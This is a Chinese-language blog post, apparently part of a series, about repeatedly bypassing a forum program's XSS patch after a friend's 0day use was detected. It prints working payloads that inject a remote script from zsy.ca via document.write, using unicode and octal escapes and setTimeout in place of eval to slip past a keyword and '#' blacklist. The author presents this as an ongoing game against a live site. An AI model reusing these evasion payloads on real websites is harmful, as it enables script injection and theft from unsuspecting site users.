一次有趣的XSS漏洞挖掘分析（2）

第一次和一套程序做了这么多次的斗争。今天基友又给我来信说，没得玩了。了解了下情况，是他拿着0day到处插，被人家发现了。还出了个公告，说所有***必须安装补丁。呵呵，性福总是走的这么突然。这乐子一下就让人给搞没了。本来想的就算了。但是突然觉得还是想看看程序员是怎么修复的。（说实话，搞了那么多天也有感情了不是）

<p onmouseover="\u0064ocument.write('&lt;sc'+'ript src=//zsy.ca/33&gt;&lt;/sc'+'ript&gt;')">  

针对于我用上面的payload和我用eval拼接多个XSS语句的的问题，在多次黑盒测试之后发现他是这么去思考这个问题的：

1.先解决掉onmouseover,采取的方式是发现onmou就拦截发贴
2.解决编码绕过问题。怎么做？既然可以用unicode来绕过就在发现\u时拦截
3.既然有人用eval来拼接，我就把eval过滤了。发现就拦截。
4.既然黑阔用的方法都是不闭合标签的,那么当碰到没有闭合的标签时就让content=""（其实我也想闭合显得自己专业一点。但是长度不够啊）

要再次挑战一下这个程序员么？

一个很有意思的程序员。我其实挺佩服他这种认真负责的态度的。但是方法还是不对。顺便提一下一个新发现的问题。这个问题不知道是之前就有了，还是程序员爆发了。他把“#”给过滤了。有两种可能性：

1.是个通用的防注入程序，为了防止网站被注入时攻击者使用"#"来注释多余的部分
2.他开窍了。他知道除了unicode之外，还有hex和demical只要过滤了#，我就绕不过去了。

然后顺便纠正一下我上次测试的时候，犯的一个马虎。其实标题处的长度限制是150.我可能当时测试的姿势不对- -。这个也不是今天的重点。

因为第一次对测试步骤已经说的很详细了。故不做重复的解释。在经过一系列fuzz之后发现onclick属性它没过滤。我们就有了

<p onclick="">求助</p>

还要继续解决前面的问题。之前在处理黑名单成员document时，我们使用了unicode.现在不单unicode不能用了，替代品hex和demical也不能用了（因为过滤了"#"）想了下还有octal和base16.但是base16和octal不能直接拿来编码document。如果在eval()里面就好了。可是eval()又被过滤了。怎么办呢？想了想，还有个加强版的eval()就是setTimeout(,).和eval最大的区别就是多了个Timer。但是只要把延迟设置为0那就和eval()是一样的了。

然后开始构造payload:

<p onclick="setTimeout('\144ocument.write(\47\74\163cript src=//zsy.ca/33\76\74/\163cript\76\47)',0)">域名问题</p>

一个没有eval,unicode,document,char,onmouseover,script和#的payload又让我们给写好了.性福总是来的这么突然。不知道这次穿帮又会是什么时候。期待程序员下次更好的表现呢。程序猿，加油！

这次的可能有点短。如果大家都觉得挺有意思的话下次他再更新程序了，我会再次跟进测试然后发到这里。如果觉得太无趣了的话也可以说一下，我也就不发了。